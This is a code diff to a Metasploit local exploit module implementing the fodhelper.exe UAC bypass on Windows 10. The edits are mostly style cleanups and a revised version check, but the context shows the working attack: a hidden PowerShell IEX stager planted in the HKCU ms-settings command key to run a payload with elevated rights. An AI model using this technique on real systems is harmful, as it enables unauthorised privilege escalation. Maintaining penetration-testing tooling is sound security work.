@@ -11,12 +11,12 @@ class MetasploitModule < Msf::Exploit::Local
   include Post::Windows::Registry
   include Post::Windows::Runas
 
-  FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
-  FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
+  FODHELPER_DEL_KEY = 'HKCU\\Software\\Classes\\ms-settings'.freeze
+  FODHELPER_WRITE_KEY = 'HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command'.freeze
   EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
   EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
   EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
-  FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
+  FODHELPER_PATH = '%WINDIR%\\System32\\fodhelper.exe'.freeze
   CMD_MAX_LEN = 16383
 
   def initialize(info = {})
@@ -67,7 +67,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
@@ -77,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     commspec = '%COMSPEC%'
     registry_view = REGISTRY_VIEW_NATIVE
-    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+    psh_path = '%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe'
 
     # Make sure we have a sane payload configuration
     if sysinfo['Architecture'] == ARCH_X64
@@ -87,18 +88,16 @@ class MetasploitModule < Msf::Exploit::Local
         if target_arch.first == ARCH_X64
           # We can't use absolute path here as
           # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
-          psh_path = "powershell.exe"
+          psh_path = 'powershell.exe'
         end
       end
       if target_arch.first == ARCH_X86
         # Invoking x86, so switch to SysWOW64
-        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
+        psh_path = '%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe'
       end
-    else
+    elsif target_arch.first == ARCH_X64
       # if we're on x86, we can't handle x64 payloads
-      if target_arch.first == ARCH_X64
-        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
-      end
+      fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
     end
 
     if !payload.arch.empty? && (payload.arch.first != target_arch.first)
@@ -137,14 +136,14 @@ class MetasploitModule < Msf::Exploit::Local
     psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
     cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
 
-    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
+    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ''
     exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
 
     if existing.empty?
       registry_createkey(FODHELPER_WRITE_KEY, registry_view)
     end
 
-    print_status("Configuring payload and stager registry keys ...")
+    print_status('Configuring payload and stager registry keys ...')
     unless exist_delegate
       registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
     end
@@ -162,11 +161,11 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Wait a copule of seconds to give the payload a chance to fire before cleaning up
     # TODO: fix this up to use something smarter than a timeout?
-    Rex::sleep(5)
+    Rex.sleep(5)
 
     handler(client)
 
-    print_status("Cleaining up registry keys ...")
+    print_status('Cleaning up registry keys ...')
     unless exist_delegate
       registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
     end
@@ -186,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Local
     admin_group = is_in_admin_group?
 
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
 
     unless is_in_admin_group?
@@ -197,12 +196,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
